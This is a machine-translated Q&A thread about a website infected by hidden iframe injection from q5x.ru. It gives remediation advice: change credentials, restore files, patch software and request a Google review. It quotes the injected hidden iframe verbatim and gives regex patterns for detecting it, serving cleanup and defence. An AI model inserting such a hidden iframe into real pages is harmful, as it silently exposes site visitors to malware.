web-dev-qa-db-ja.com

隠しiframeで攻撃されたウェブサイト(q5x.ru)

私のウェブサイトは最近、隠されたiframeの挿入を伴うある種の攻撃に感染しており、そのソースはサイトq5x.ru(リンクしない)からのものでした。

A Google検索 この攻撃がどのように行われたかを理解するのに役立たなかったので、誰かがこれと同じ問題に遭遇したのではないかと思いました。

Iframeコードはある種のものでした:

<iframe src="http://q5x.ru:8080/index.php" width=109 height=175 style="visibility: hidden"></iframe>

リクエストに応じて、データベースを使用してASP.Net Webサイトを実行しています。フォームに関しては、ポストバックに使用されるのは明らかにASP.Netフォームです。

websiteexploitmalwareattacks
2
Andreas Grech

最近、クライアントのWebサイトの1つで同じ問題が発生しました。

この問題は、主にFTPクライアントを対象とし、ホスト名/ユーザー名/パスワードの組み合わせを検索するウイルス感染が原因である可能性があります。見つかると、FTPサーバーへの接続が開かれ、index。*ファイルが検索され、iFrameが追加されます。

私たちの特定のケースでは、私たちのクライアントはFTPサーバーに直接アクセスできる数少ないクライアントの1つでした。すぐにパスワードを変更し、ファイルのバックアップを復元し、クライアントのFTPアクセスを削除しました。

実行する必要のある手順:

  • パスワードを変更するすぐに
  • サーバーのFTPログにアクセスできる場合は、どのファイルが感染しているかを調べます
  • 感染したファイルについては、これらのファイルを手動で復元し、デフォルトでは検索/置換を使用しないことを強くお勧めします。ほとんどの場合、IFrameはファイルの最後に追加されますが、ファイルが部分的に削除されることもあります。

また、Googleクローラーが感染中にサイトにアクセスすると、マルウェアリストに追加されることに注意してください。 これはあなたのサイトの評判に深刻な影響を及ぼします。これが発生した場合、次の手順を実行します

  1. サイトに感染したファイルが含まれていないことを確認します
  2. サイトが Googleウェブマスターツール で確認されていることを確認してください
  3. Googleウェブマスターツールを使用して 新しいサイトのレビューをリクエスト
4
Aron Rotteveel

ここにあなたを助けるかもしれないいくつかの秘訣があります:

  1. この種の攻撃を防ぐために最初に行うことは、ftp、コントロールパネル、およびデータベースのパスワードをできるだけ早く変更することです。
  2. サーバーのファイル権限を最大セキュアモードに変更します。
  3. サーバーからすべてのファイルをダウンロードし、感染を確認します。感染したファイルをクリーンアップします。
  4. 優れたウイルス対策ソフトウェアを使用して、ホスティングサーバーへのログインに使用するすべてのPCをスキャンしてクリーンアップします。
  5. 公共のコンピューターを使用してサーバーにアクセスしないでください。

感染したファイルをクリーンアップするにはどうすればよいですか?

これらの正規表現を使用して、悪意のあるコードを含むすべてのページを検索し、スペースに置き換えます。

<iframe src=\”http://[^"]*” width=105 height=175 style=\”visibility:hidden;
position:absolute\”></iframe>

echo \”<iframe src=\\\”http://[^"]*\” width=105 height=175 style=\\\”
visibility:hidden; position:absolute\\\”></iframe>\”;

サーバー内のすべてのファイルに対してこれを自動化するスクリプトを作成する必要がある場合があります。

出典:http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/

https://stackoverflow.com/questions/990437/iframe-script-attack-to-website

3
joe

これは以前私に起こりました。問題のあるインジェクションスクリプトを手動で検索して削除する必要があります。念のため、パスワードを変更し、データベースとデータベーステーブルの名前も変更することをお勧めします。

0
user14898

@Aron writes おそらく、クライアント側のウイルスがパスワードをキャプチャした可能性がありますが(これは、この特定の攻撃に当てはまる可能性があります)、この種の攻撃は、サーバーソフトウェアのパッチが適用されていない脆弱性を悪用することがよくあります。 Webサーバー自体、CMS、または phpMyAdmin などのツールと同様です。

つまり、サーバー上ですべてのソフトウェアの最新バージョンを実行していることを確認しますか?

(または、FTPログは実際に何らかのアクティビティを示していますか?)

0
Arjan